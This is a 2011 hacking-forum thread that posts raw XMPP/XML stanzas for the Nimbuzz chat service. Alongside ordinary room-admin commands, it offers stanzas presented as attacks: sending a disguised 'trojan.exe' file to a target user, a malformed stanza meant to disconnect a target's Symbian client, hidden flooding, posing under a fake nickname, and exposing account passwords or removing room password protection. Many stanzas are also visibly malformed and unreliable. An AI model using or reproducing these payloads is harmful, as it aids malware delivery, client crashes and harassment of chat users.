ZOMBIE CLUB
Would you like to react to this message? Create an account in a few clicks or log in to continue.

ZOMBIE CLUB


 
HomeLatest imagesSearchRegisterLog in

 

 New XML Scripts...

Go down 
AuthorMessage
(๏_ƒя33.13σע_๏)

(๏_ƒя33.13σע_๏)


Posts : 101
Join date : 2011-07-10
Age : 33
Location : hell

New XML Scripts... Empty
PostSubject: New XML Scripts...   New XML Scripts... I_icon_minitimeTue Jul 26, 2011 10:44 pm

Send Virus through Xml

Code:
<message to"user_id@nimbuzz.com/resource"><body>isi pesan</body><file xmlns="http://jabber.org/protocol/si/profil/file-transfer" name="trojan.exe.exe.exe.exe.exe"
size="520"><desc/><x xmlns="jabberata" type="result"><field var="tags"><value>others</value>
</field></x></file><x xmlns="jabberelay" from="nimbuzz.com" stamp="20090811T15:51:47"/>
</message>


Enter Room With Yahoo ID

Code:
<presence from='your-id@yahoo.com/yahoo-messanger' to='name_room@conference.nimbuzz.com/your-id'><x xmlns='jabber:avatar'><hash>8dbc74f79d550e44501f d2f0d19926c7684c2a40</hash></x><x xmlns='http://jabber.org/protocol/muc#user'><item jid='your-id@yahoo.com/yahoo messanger' affiliation='participant' role='none'/></x></presence>


Left Room with another ID

Code:
<presence to="RO0M. Name/NEW NICK NAME" type="unavailable"><status></status></presence>


Check Client Version in Room

Code:
<iq to="room-name@conference.nimbuzz.com" type="get"><query xmlns="jabber:iq:version"/></iq>


Delete ID from Server

Code:
<iq to="nimbuzz.com" id="discoResult"><query xmlns="jabber:iq:register"><remove/></query></iq>


Make New Id By Script

Code:
<iq to="TARNSPORT-1"type="set"id="discoResult"><query xmlns="jabber:data"type="submit"><field var="username"type="text-single"><value>YOUR_NEW_ID</value></field><field var="pas_word"type="text-private"><value>pas_word</value></field><field var="server"type="text-single"><value>nimbuzz.com</value></field><field var="domain"type="text-single"><value>openfire.nimbuzz.com</value></field><field var="port"type="text-single"><value>5222</value></field></x></query></iq>


Chat with Fake Nickname in room working

Code:
<MESSAGE TO='ROOM_NAME@CONFERENCE.NIMBUZZ.COM/TARGET_NICK'><BODY>YOUR_PM</><SUBJECT>NEW_NICK</SUBJECT><MESSAGE>


Script for Change ID Password

Code:
<iq to="nimbuzz.com"><query xmlns="jabber:iq:register"><x xmlns="jabber:data">< var field = "FORM_TYPE" type = "hidden"><value> jabber: iq: register </ value></ field><field var="username"><value>YOUR ID</ value></ field><field var="name"><value></ value></ field><field var="password"><value> NEW PASSWORD </ value></ field></ x></ query></ iq>


RoOm CoNfIGuRe XmL ScRiPt

Code:
<iq id="nimbuzz_submitroomconfingform" to="ROOM NAME"><query xmlns="http://jabber.org/protocol/muc#owner"><x type="submit" xmlns="jabber:data"><field var="FORM_TYPE"><value>http://jabber.org/protocol/muc#roomconfig</value></field><field var="muc#roomconfig_roomname"><value>ROOM NAME HERE</value></field><field var="muc#roomconfig_maxusers"><value>25</value></field><field var="muc#roomconfig_publicroom"><value>1</value></field><field var="muc#roomconfig_persistentroom"><value>1</value></field><field var="muc#roomconfig_membersonly"><value>0</value></field><field var="muc#roomconfig_whois"><value>anyone</value></field></x></query></iq>

BaN 10 ID aT A TiMe

Code:
<iq to="ROOMNAME@conference.nimbuzz.com" type="set"><query xmlns="http://jabber.org/protocol/muc#admin"><item affiliation="outcast" jid="BAN1@nimbuzz.com"/><item affiliation="outcast" jid="BAN2@nimbuzz.com"/><item affiliation="outcast" jid="BAN3@nimbuzz.com"/><item affiliation="outcast" jid="BAN4@nimbuzz.com"/><item affiliation="outcast" jid="BAN5@nimbuzz.com"/><item affiliation="outcast" jid="BAN6@nimbuzz.com"/><item affiliation="outcast" jid="BAN7@nimbuzz.com"/><item affiliation="outcast" jid="BAN8@nimbuzz.com"/><item affiliation="outcast" jid="BAN9@nimbuzz.com"/><item affiliation="outcast" jid="BAN10@nimbuzz.com"/></query></iq>


Invite User to Room

Code:
<message to="roomname@conference.nimbuzz.com"><x xmlns="http://jabber.org/protocol/muc#user"><invite to="nickname@nimbuzz.com"><reason></reason></invite></x></message></message>


Make ur room name like R0oM_NAmE

Code:
<iq type="set" to="Room_Name@conference.nimbuzz.com"><query xmlns="http://jabber.org/protocol/muc#owner"><x type="submit" xmlns="jabber:data"><field var="FORM_TYPE"><value>http://jabber.org/protocol/muc#roomconfig</value></field><field var="muc#roomconfig_roomname"><value>rOoM_nAmE</value></field></x></query></iq>


MaKe ViSiToR ThRoUgH XmL ScRiPt

Code:
<iq xmlns="jabber:client" to="room-name@conference.nimbuzz.com" id="foysal3">
<query xmlns="http://jabber.org/protocol/muc#admin">
<item nick="target-id" role="visitor" />
</query>
</iq>


Dc symbian through xml script

Code:
<iq to="TARGET-ID@nimbuzz.com/RESOURCE" type="get"><:хммp xmlns="http://jabber.org/protocol/geoloc"/></iq>


Show room users without entering to room

Code:
<iq to="RoOm [You must be registered and logged in to see this link.]" type="get"><query xmlns="http://jabber.org/protocol/disco#items"/></iq>


SeArCh RoOm bY XmL

Code:
<iq id="Nimbuzz_SearchRooms" to="conference.nimbuzz.com"><query xmlns="jabber:iq:search"><set xmlns="http://jabber.org/protocol/rsm"><index>0</index><max>10</max></set><x type="get" xmlns="jabber:data"><field var="name"><value> R00M NAME HERE </value></field><field var="include_password_protected"><value>true</value></field></x></query></iq>


MaKe mOdErAtOr aNyOnE

Code:
<iq to="ROOMNICKHERE@conference.nimbuzz.com"type="set" id="[You must be registered and logged in to see this link.] R NICK"/></query></iq>


bache-poldar-original
Admin

Posts: 214
Join date: 2011-04-26
Age: 21
Location: iran-shiraz

View user profile Send private message Send an e-mail message [You must be registered and logged in to see this link.]

Back to top

SHOW ID PASSWORD

Code:
<iq type="get"to="nimbuzz.com"id="3"><query xmlns="jabber:iq:register"/></iq>


HIDE NICK MESSAGE ROOM

Code:
<message to="roomname@conference.nimbuzz.com</body></message>


HIDDEN FLOOD

Code:
<presence to="nickname@nimbuzz.com/resource "message"<x xmlns="http://jabber.org/protocol/muc#user"/></presence>


REMOVE PASSWORD PROTECTECTION

Code:
<iq to="ROOMNAME@conference.nimbuzz.com" type="set" id="muc_owner"><query xmlns="http://jabber.org/protocol/muc#owner"><x xmlns="jabber:data" type="submit"><field var="muc#roomconfig_roomname" type="text-single"><value>ROOMNAME</value></field><field var="muc#roomconfig_roomdesc" type="text-single"><value></value></field><field var="muc#roomconfig_persistentroom" type="boolean"><value>1</value></field><field var="muc#roomconfig_passwordprotectedroom" type="boolean"><value>0</value></field><field var="muc#roomconfig_roomsecret" type="text-single"><value>bks</value></field><field var="muc#roomconfig_maxusers" type="list-single"/></x></query></iq>


buzz massege

Code:
<message to="ID@nimbuzz.com"><body>Let's talk</body><x xmlns="http://nimbuzz.com/protocol/buzz" type="call" status="unread"/></message>Dc nimbuzz hide contect

<iq to="nickname@nimbuzz.com/Nimbuzz_Symbian621" id="getros" type="result"><query xmlns="jabber:iq:roster"></query></iq>

enjoy Rolling Eyes

Back to top Go down
 
New XML Scripts...
Back to top 
Page 1 of 1
 Similar topics
-
» xml scripts

Permissions in this forum:You cannot reply to topics in this forum
ZOMBIE CLUB :: NIMBUZZING :: xml scripts-
Jump to: